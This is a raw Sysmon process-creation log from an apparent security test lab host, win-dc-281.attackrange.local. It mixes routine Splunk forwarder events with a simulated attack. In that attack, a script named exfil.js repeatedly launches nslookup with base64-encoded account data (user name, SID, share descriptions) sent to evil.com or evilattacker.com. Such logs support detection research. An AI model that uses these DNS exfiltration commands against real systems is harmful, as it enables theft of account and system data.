AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074755Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:16.903{A8622C2F-5C80-6078-A60F-00000000AE01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074746Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:16.236{A8622C2F-5C80-6078-A50F-00000000AE01}5108C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000074710Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:07.579{A8622C2F-5C77-6078-A40F-00000000AE01}6516C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C77-6078-A20F-00000000AE01}6672C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldw.tmp 2>&1 154100x800000000000000074699Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:32:07.550{A8622C2F-5C77-6078-A20F-00000000AE01}6672C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckNhcHRpb246IEFUVEFDS1JBTkdFXEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlldw.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074652Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:55.135{A8622C2F-5C6B-6078-A10F-00000000AE01}6084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating 
SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C6B-6078-9F0F-00000000AE01}5864C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmz.tmp 2>&1 154100x800000000000000074641Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:55.106{A8622C2F-5C6B-6078-9F0F-00000000AE01}5864C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldmz.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074571Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:37.488{A8622C2F-5C59-6078-9E0F-00000000AE01}5368C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com 
C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C59-6078-9C0F-00000000AE01}4376C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnwuq.tmp 2>&1 154100x800000000000000074560Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:37.458{A8622C2F-5C59-6078-9C0F-00000000AE01}4376C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldnwuq.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074513Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:25.047{A8622C2F-5C4D-6078-9B0F-00000000AE01}3904C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com 
C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C4D-6078-990F-00000000AE01}5084C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcrgot.tmp 2>&1 154100x800000000000000074502Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:25.018{A8622C2F-5C4D-6078-990F-00000000AE01}5084C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nldcrgot.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074485Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:22.144{A8622C2F-5C4A-6078-980F-00000000AE01}7036C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074470Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:20.658{A8622C2F-5C48-6078-970F-00000000AE01}5800C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074458Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:19.992{A8622C2F-5C47-6078-960F-00000000AE01}6108C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074448Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:19.312{A8622C2F-5C47-6078-950F-00000000AE01}7140C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT 
AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074432Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:17.462{A8622C2F-5C45-6078-940F-00000000AE01}6084C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:16.780{A8622C2F-5C44-6078-930F-00000000AE01}4640C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 
154100x800000000000000074414Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:16.221{A8622C2F-5C44-6078-920F-00000000AE01}5664C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A8622C2F-3DEC-6078-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{A8622C2F-439F-6078-3205-00000000AE01}5132C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 154100x800000000000000074349Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:07.418{A8622C2F-5C3B-6078-910F-00000000AE01}4140C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C3B-6078-8F0F-00000000AE01}4160C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubp.tmp 2>&1 154100x800000000000000074338Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:31:07.388{A8622C2F-5C3B-6078-8F0F-00000000AE01}4160C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft 
CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEFkbWluaXN0cmF0b3I= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nleubp.tmp 2>&1C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58B2-6078-F10D-00000000AE01}2576C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\temp\exfil.js" 154100x800000000000000074285Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:54.945{A8622C2F-5C2E-6078-8E0F-00000000AE01}4732C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C2E-6078-8C0F-00000000AE01}4244C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcunnu.tmp 2>&1 154100x800000000000000074274Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:54.915{A8622C2F-5C2E-6078-8C0F-00000000AE01}4244C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcunnu.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074197Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.907{A8622C2F-5C1F-6078-8B0F-00000000AE01}7044C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1F-6078-890F-00000000AE01}5316C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyns.tmp 2>&1 154100x800000000000000074184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.878{A8622C2F-5C1F-6078-890F-00000000AE01}5316C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlclNJRDogUy0xLTUtMjEtNjgwNTA3MDA3LTc4NTUwMjQ0Ni0yMDA1Mjg4MzQyLTUwMA== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlyns.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58C3-6078-FC0D-00000000AE01}4860C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074175Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.599{A8622C2F-5C1F-6078-880F-00000000AE01}6108C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1F-6078-860F-00000000AE01}4152C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyqyzy.tmp 2>&1 154100x800000000000000074164Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:39.568{A8622C2F-5C1F-6078-860F-00000000AE01}4152C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBEZWZhdWx0IHNoYXJl evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nltyqyzy.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-58DF-6078-060E-00000000AE01}2824C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074144Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:38.901{A8622C2F-5C1E-6078-850F-00000000AE01}636C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1E-6078-830F-00000000AE01}2584C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzzalt.tmp 2>&1 154100x800000000000000074133Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:38.870{A8622C2F-5C1E-6078-830F-00000000AE01}2584C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=TXT U2hhcmVEZXNjOiBSZW1vdGUgQWRtaW4= evilattacker.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlzzalt.tmp 
2>&1C:\Temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{A8622C2F-5932-6078-370E-00000000AE01}184C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 154100x800000000000000074114Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:37.334{A8622C2F-5C1D-6078-820F-00000000AE01}4808C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com C:\temp\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{A8622C2F-5C1D-6078-800F-00000000AE01}5868C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcspvihl.tmp 2>&1 154100x800000000000000074103Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 15:30:37.305{A8622C2F-5C1D-6078-800F-00000000AE01}5868C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlckZ1bGxOYW1lOiA= evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlcspvihl.tmp 
